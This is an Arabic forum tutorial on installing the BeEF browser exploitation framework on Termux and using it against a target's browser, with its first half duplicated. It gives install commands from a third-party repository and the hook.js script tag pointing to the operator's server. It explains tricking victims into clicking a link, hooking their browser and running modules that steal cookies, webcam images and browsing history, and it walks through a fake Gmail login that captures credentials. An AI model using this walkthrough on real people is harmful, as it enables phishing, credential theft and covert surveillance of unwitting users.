x32x01
أدارة أكتب كود
- بواسطة x32x01 ||
نبذة عن أداة BeEF
وسط مخاوف متزايدة بشأن الهجمات المحمولة عبر الويب ضد العملاء ، بما في ذلك عملاء الأجهزة المحمولة ، يسمح BeEF لمختبري الاختراق المحترف بتقييم الوضع الأمني الفعلي للبيئة المستهدفة باستخدام ناقلات هجوم من جانب العميل. على عكس أطر الأمان الأخرى ، تتخطى BeEF محيط الشبكة ونظام العميل المتصلب ، وتفحص قابلية الاستغلال في سياق الباب المفتوح: متصفح الويب. ستعمل BeEF على ربط واحد أو أكثر من متصفحات الويب واستخدامها كرؤوس جسور لإطلاق وحدات أوامر موجهة والمزيد من الهجمات ضد النظام من داخل سياق المتصفح.
يستخدم الأشخاص المتصفحات لجميع أنواع الأشياء ، وبشكل عام ، نحن نثق في الكثير من المعلومات الشخصية لهم. هذا هو السبب في أن المتصفحات هي سطح هجوم مثالي للمخترق ، لأن الهدف قد لا يعرف حتى أنه مصاب ويغذيك بكل المعلومات التي قد تريدها.
للقيام بذلك ، تحتاج أولاً إلى خداع المستخدم للنقر فوق ارتباط. لإنشاء الرابط ، يمكنك استخدام أداة تسمى BeEF ، والتي كانت مثبتة مسبقًا على Kali Linux
على غرار Metasploit ، يعد BeEF ، الذي يرمز إلى Browser Exploitation Framework ، إطارًا لشن الهجمات. على عكس Metasploit ، فهو خاص بشن هجمات ضد متصفحات الويب. في بعض الحالات ، يمكننا استخدام BeEF جنبًا إلى جنب مع Metasploit لبدء سيناريوهات هجوم أكثر تقدمًا.
تم تطوير الأداة بواسطة مجموعة من المطورين بقيادة Wade Alcorn . تم تصميم BeEF على نظام Ruby on Rails المألوف لاستكشاف نقاط الضعف في المتصفحات واختبارها. على وجه الخصوص ، تعد BeEF منصة ممتازة لاختبار ضعف المتصفح في البرمجة النصية عبر المواقع (XSS) وهجمات الحقن الأخرى.
يمكن لـ BeEF إنشاء رابط يمكنه تتبع الهدف وحتى تشغيل الوحدات النمطية لتصعيد الأذونات وجمع المزيد من المعلومات حول الشخص الذي يقف خلف الكمبيوتر. يمكنه حتى إجراء مسح ضوئي خلف الشبكة التي يستخدمها الشخص ، وهو أمر مثير للإعجاب حيث يمكنك التقاط الصور باستخدام كاميرا الويب الخاصة به ، ومعرفة ما يكتبه ، وإطلاق صفحات التصيد لمحاولة الحصول على بيانات الاعتماد.
التثبيت على Termux
تحديث بيانات apt
ضبط ال source لتثبيت
اضافة شهادة السورس للمثبت apt
تحديث محتوى السورس
تنزيل BeEF والتثبيت
والان أنتظر حتى يكتمل التثبيت وابقي الانترنت متصلا حتى انتهاء العملية
التشغيل
كيفية الاستعمال
أولا تشغيل الاداة باستخدام الامر beef أو beef-xss
انسخ الرابط الذي سوف يظهر على الشاشة وألصقه في المتصفح
الرابط مثل
[*] سجّل الدخول إلى خدمة BeEF
بمجرد فتح واجهة المتصفح ، ستحتاج إلى تسجيل الدخول إلى خدمة BeEF. بيانات الاعتماد الافتراضية هي لحم بقري لاسم المستخدم ولحم البقر لكلمة المرور. ومع ذلك ، ربما تمت مطالبتك بإنشاء كلمة مرور لجلسة لحوم البقر الخاصة بك (كما هو موضح أعلاه) ، وفي هذه الحالة ، يمكنك استخدام لحم البقر كاسم مستخدم وأي كلمة مرور تختارها.
بعد تسجيل الدخول بنجاح ، يجب أن تشاهد صفحة "البدء" مع معلومات حول كيفية عمل BeEF. على اليسار ، يوجد عمود Hooked Browsers ، حيث ستنتهي جميع المتصفحات التي تتحكم فيها.
[*] ربط متصفح الهدف
مفتاح النجاح مع BeEF هو "ربط" المتصفح. هذا يعني أننا نحتاج إلى الهدف لزيارة تطبيق ويب ضعيف باستخدام ملف JavaScript "hook.js". للتدريب ، يوفر BeEF صفحة ويب لمضيفك المحلي مع الحمولة الموجودة فيه ، لذا قم بزيارة ذلك لمعرفة كيفية عمله.
تستجيب الشفرة المحقونة في المتصفح الموصوف للأوامر من خادم BeEF الذي نتحكم فيه. من هناك ، يمكننا القيام بالعديد من الأشياء المؤذية على كمبيوتر الهدف.
[*] عرض تفاصيل المتصفح
لدي بعض المتصفحات المتصلة ، لكنني سألقي نظرة على متصفح Chrome. انقر فوق المتصفح الخاص بك ، وسوف ينتقل بك إلى علامة التبويب "التفاصيل" ، والتي توفر معلومات حول المتصفح المعلق. يظهر المنجم مثل Chrome في القيم.
ستظهر لك علامة التبويب هذه أكثر من ذلك بكثير. بالنسبة لي ، أرى أن النظام الأساسي هو Linux x86_64 ؛ أنه يحتوي على مكون Chrome PDF الإضافي وعارض Chrome PDF ومكونات Native Client ؛ تشمل المكونات webgl و webrtc و websocket ؛ وغيرها من المعلومات الشيقة.
[*] نفذ الأوامر في المتصفح
الآن بعد أن وصلنا متصفح الهدف ، يمكننا تنفيذ بعض الوحدات المدمجة من علامة التبويب "الأوامر".
هناك أكثر من 300 وحدة نمطية ، من اختراق المتصفح إلى الهندسة الاجتماعية ، بما في ذلك ، على سبيل المثال لا الحصر:
بعد تنفيذه ، ستظهر صفحة تسجيل دخول وهمية إلى Gmail في المتصفح المعلق. قد لا يفكر المستخدم مرتين في إدخال اسم المستخدم وكلمة المرور الخاصة به ، وبمجرد قيامه بذلك ، نقوم بتسجيله. بعد ذلك ، يتم توجيههم مرة أخرى إلى موقع Google كما لو كانوا يقومون بتسجيل الدخول بانتظام.
للعثور على اسم المستخدم وكلمة المرور اللذين قمنا بتسجيلهما ، ما عليك سوى النقر فوق الأمر الموجود في عمود " سجل نتائج الوحدة ". بالنسبة لي ، أرى "hfhfhf" باعتباره المستخدم و "sdliasdflihasdflh" ككلمة المرور. يمكنك أيضًا عرض هذه المعلومات من علامة التبويب "السجلات".
إذا أردنا ذلك ، يمكننا تخصيص عنوان URL الذي تستخدمه وحدة التصيد الاحتيالي من Google ، في حالة رغبتك في استخدام شيء أكثر تصديقًا من واجهة Gmail ذات النمط القديم.
بمجرد توصيل المتصفح ، توجد إمكانيات غير محدودة تقريبًا لما يمكننا القيام به. يمكنك حتى الاستفادة من BeEF لهجمات نظام التشغيل. لمزيد من الأمثلة حول ما يمكن أن يساعدك BeEF في تحقيقه ، مثل الوصول إلى كاميرا الويب ومراقبة ضغطات المفاتيح.
BeEF هي أداة هجوم قوية لمتصفح الويب
تعد BeEF أداة غير عادية وقوية لاستغلال متصفحات الويب ، وهي مثال مرعب على سبب عدم النقر فوق الروابط المشبوهة مطلقًا. حتى لو بدت الأمور على ما يرام ، يجب أن تكون حذرًا حقًا بشأن أي شيء ينبثق في متصفحك للحصول على إذن للوصول إلى كاميرا الويب أو الصوت أو الذي يتطلب منك إدخال بيانات اعتماد الحساب.
وسط مخاوف متزايدة بشأن الهجمات المحمولة عبر الويب ضد العملاء ، بما في ذلك عملاء الأجهزة المحمولة ، يسمح BeEF لمختبري الاختراق المحترف بتقييم الوضع الأمني الفعلي للبيئة المستهدفة باستخدام ناقلات هجوم من جانب العميل. على عكس أطر الأمان الأخرى ، تتخطى BeEF محيط الشبكة ونظام العميل المتصلب ، وتفحص قابلية الاستغلال في سياق الباب المفتوح: متصفح الويب. ستعمل BeEF على ربط واحد أو أكثر من متصفحات الويب واستخدامها كرؤوس جسور لإطلاق وحدات أوامر موجهة والمزيد من الهجمات ضد النظام من داخل سياق المتصفح.
يستخدم الأشخاص المتصفحات لجميع أنواع الأشياء ، وبشكل عام ، نحن نثق في الكثير من المعلومات الشخصية لهم. هذا هو السبب في أن المتصفحات هي سطح هجوم مثالي للمخترق ، لأن الهدف قد لا يعرف حتى أنه مصاب ويغذيك بكل المعلومات التي قد تريدها.
للقيام بذلك ، تحتاج أولاً إلى خداع المستخدم للنقر فوق ارتباط. لإنشاء الرابط ، يمكنك استخدام أداة تسمى BeEF ، والتي كانت مثبتة مسبقًا على Kali Linux
على غرار Metasploit ، يعد BeEF ، الذي يرمز إلى Browser Exploitation Framework ، إطارًا لشن الهجمات. على عكس Metasploit ، فهو خاص بشن هجمات ضد متصفحات الويب. في بعض الحالات ، يمكننا استخدام BeEF جنبًا إلى جنب مع Metasploit لبدء سيناريوهات هجوم أكثر تقدمًا.
تم تطوير الأداة بواسطة مجموعة من المطورين بقيادة Wade Alcorn . تم تصميم BeEF على نظام Ruby on Rails المألوف لاستكشاف نقاط الضعف في المتصفحات واختبارها. على وجه الخصوص ، تعد BeEF منصة ممتازة لاختبار ضعف المتصفح في البرمجة النصية عبر المواقع (XSS) وهجمات الحقن الأخرى.
يمكن لـ BeEF إنشاء رابط يمكنه تتبع الهدف وحتى تشغيل الوحدات النمطية لتصعيد الأذونات وجمع المزيد من المعلومات حول الشخص الذي يقف خلف الكمبيوتر. يمكنه حتى إجراء مسح ضوئي خلف الشبكة التي يستخدمها الشخص ، وهو أمر مثير للإعجاب حيث يمكنك التقاط الصور باستخدام كاميرا الويب الخاصة به ، ومعرفة ما يكتبه ، وإطلاق صفحات التصيد لمحاولة الحصول على بيانات الاعتماد.
التثبيت على Termux
تحديث بيانات apt
Code:
apt update
ضبط ال source لتثبيت
Code:
mkdir -p $PREFIX/etc/apt/sources.list.d
printf "deb https://hax4us.github.io/TermuxBlack/ termuxblack main" > $PREFIX/etc/apt/sources.list.d/termuxblack.list
اضافة شهادة السورس للمثبت apt
Code:
apt install -y gpg
wget -q https://hax4us.github.io/TermuxBlack/termuxblack.key -O termuxblack.key
apt-key add termuxblack.key
تحديث محتوى السورس
Code:
apt-get update -yq --silent
تنزيل BeEF والتثبيت
Code:
apt install -y beef-xss
والان أنتظر حتى يكتمل التثبيت وابقي الانترنت متصلا حتى انتهاء العملية
التشغيل
Code:
beef
كيفية الاستعمال
أولا تشغيل الاداة باستخدام الامر beef أو beef-xss
Code:
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*] Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
● beef-xss.service - LSB: BeEF
Loaded: loaded (/etc/init.d/beef-xss; generated)
Active: active (running) since Fri 2020-05-08 12:51:38 EDT; 5s ago
Docs: man:systemd-sysv-generator(8)
Process: 1432 ExecStart+/etc/init.d/beef-xss start (code=excited, status=0/SUCCESS)
Tasks: 10 (limit: 6715)
Memory: 140.8M
CGroup: /system.slice/beef-xss.service
└─1438 ruby /usr/share/beef-xss/beef
May 08 12:51:42 kali beef[1]: Starting LSB: BeEF...
May 08 12:51:42 kali beef[1]: Started LSB: BeEF.
[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...
انسخ الرابط الذي سوف يظهر على الشاشة وألصقه في المتصفح
الرابط مثل
Code:
http://127.0.0.1:3000/ui/panel
[*] سجّل الدخول إلى خدمة BeEF
بمجرد فتح واجهة المتصفح ، ستحتاج إلى تسجيل الدخول إلى خدمة BeEF. بيانات الاعتماد الافتراضية هي لحم بقري لاسم المستخدم ولحم البقر لكلمة المرور. ومع ذلك ، ربما تمت مطالبتك بإنشاء كلمة مرور لجلسة لحوم البقر الخاصة بك (كما هو موضح أعلاه) ، وفي هذه الحالة ، يمكنك استخدام لحم البقر كاسم مستخدم وأي كلمة مرور تختارها.
بعد تسجيل الدخول بنجاح ، يجب أن تشاهد صفحة "البدء" مع معلومات حول كيفية عمل BeEF. على اليسار ، يوجد عمود Hooked Browsers ، حيث ستنتهي جميع المتصفحات التي تتحكم فيها.
[*] ربط متصفح الهدف
مفتاح النجاح مع BeEF هو "ربط" المتصفح. هذا يعني أننا نحتاج إلى الهدف لزيارة تطبيق ويب ضعيف باستخدام ملف JavaScript "hook.js". للتدريب ، يوفر BeEF صفحة ويب لمضيفك المحلي مع الحمولة الموجودة فيه ، لذا قم بزيارة ذلك لمعرفة كيفية عمله.
Code:
http://127.0.0.1:3000/demos/basic.html
تستجيب الشفرة المحقونة في المتصفح الموصوف للأوامر من خادم BeEF الذي نتحكم فيه. من هناك ، يمكننا القيام بالعديد من الأشياء المؤذية على كمبيوتر الهدف.
[*] عرض تفاصيل المتصفح
لدي بعض المتصفحات المتصلة ، لكنني سألقي نظرة على متصفح Chrome. انقر فوق المتصفح الخاص بك ، وسوف ينتقل بك إلى علامة التبويب "التفاصيل" ، والتي توفر معلومات حول المتصفح المعلق. يظهر المنجم مثل Chrome في القيم.
ستظهر لك علامة التبويب هذه أكثر من ذلك بكثير. بالنسبة لي ، أرى أن النظام الأساسي هو Linux x86_64 ؛ أنه يحتوي على مكون Chrome PDF الإضافي وعارض Chrome PDF ومكونات Native Client ؛ تشمل المكونات webgl و webrtc و websocket ؛ وغيرها من المعلومات الشيقة.
[*] نفذ الأوامر في المتصفح
الآن بعد أن وصلنا متصفح الهدف ، يمكننا تنفيذ بعض الوحدات المدمجة من علامة التبويب "الأوامر".
هناك أكثر من 300 وحدة نمطية ، من اختراق المتصفح إلى الهندسة الاجتماعية ، بما في ذلك ، على سبيل المثال لا الحصر:
- الحصول على المجالات التي تمت زيارتها (مستعرض)
- الحصول على عناوين URL التي تمت زيارتها (متصفح)
- كاميرا الويب (متصفح)
- احصل على جميع ملفات تعريف الارتباط (امتداد)
- الاستيلاء على جهات اتصال Google (ملحق)
- لقطة شاشة (امتداد)
- سرقة الإكمال التلقائي (الهندسة الاجتماعية)
- التصيد الاحتيالي من Google (الهندسة الاجتماعية)
بعد تنفيذه ، ستظهر صفحة تسجيل دخول وهمية إلى Gmail في المتصفح المعلق. قد لا يفكر المستخدم مرتين في إدخال اسم المستخدم وكلمة المرور الخاصة به ، وبمجرد قيامه بذلك ، نقوم بتسجيله. بعد ذلك ، يتم توجيههم مرة أخرى إلى موقع Google كما لو كانوا يقومون بتسجيل الدخول بانتظام.
للعثور على اسم المستخدم وكلمة المرور اللذين قمنا بتسجيلهما ، ما عليك سوى النقر فوق الأمر الموجود في عمود " سجل نتائج الوحدة ". بالنسبة لي ، أرى "hfhfhf" باعتباره المستخدم و "sdliasdflihasdflh" ككلمة المرور. يمكنك أيضًا عرض هذه المعلومات من علامة التبويب "السجلات".
إذا أردنا ذلك ، يمكننا تخصيص عنوان URL الذي تستخدمه وحدة التصيد الاحتيالي من Google ، في حالة رغبتك في استخدام شيء أكثر تصديقًا من واجهة Gmail ذات النمط القديم.
بمجرد توصيل المتصفح ، توجد إمكانيات غير محدودة تقريبًا لما يمكننا القيام به. يمكنك حتى الاستفادة من BeEF لهجمات نظام التشغيل. لمزيد من الأمثلة حول ما يمكن أن يساعدك BeEF في تحقيقه ، مثل الوصول إلى كاميرا الويب ومراقبة ضغطات المفاتيح.
BeEF هي أداة هجوم قوية لمتصفح الويب
تعد BeEF أداة غير عادية وقوية لاستغلال متصفحات الويب ، وهي مثال مرعب على سبب عدم النقر فوق الروابط المشبوهة مطلقًا. حتى لو بدت الأمور على ما يرام ، يجب أن تكون حذرًا حقًا بشأن أي شيء ينبثق في متصفحك للحصول على إذن للوصول إلى كاميرا الويب أو الصوت أو الذي يتطلب منك إدخال بيانات اعتماد الحساب.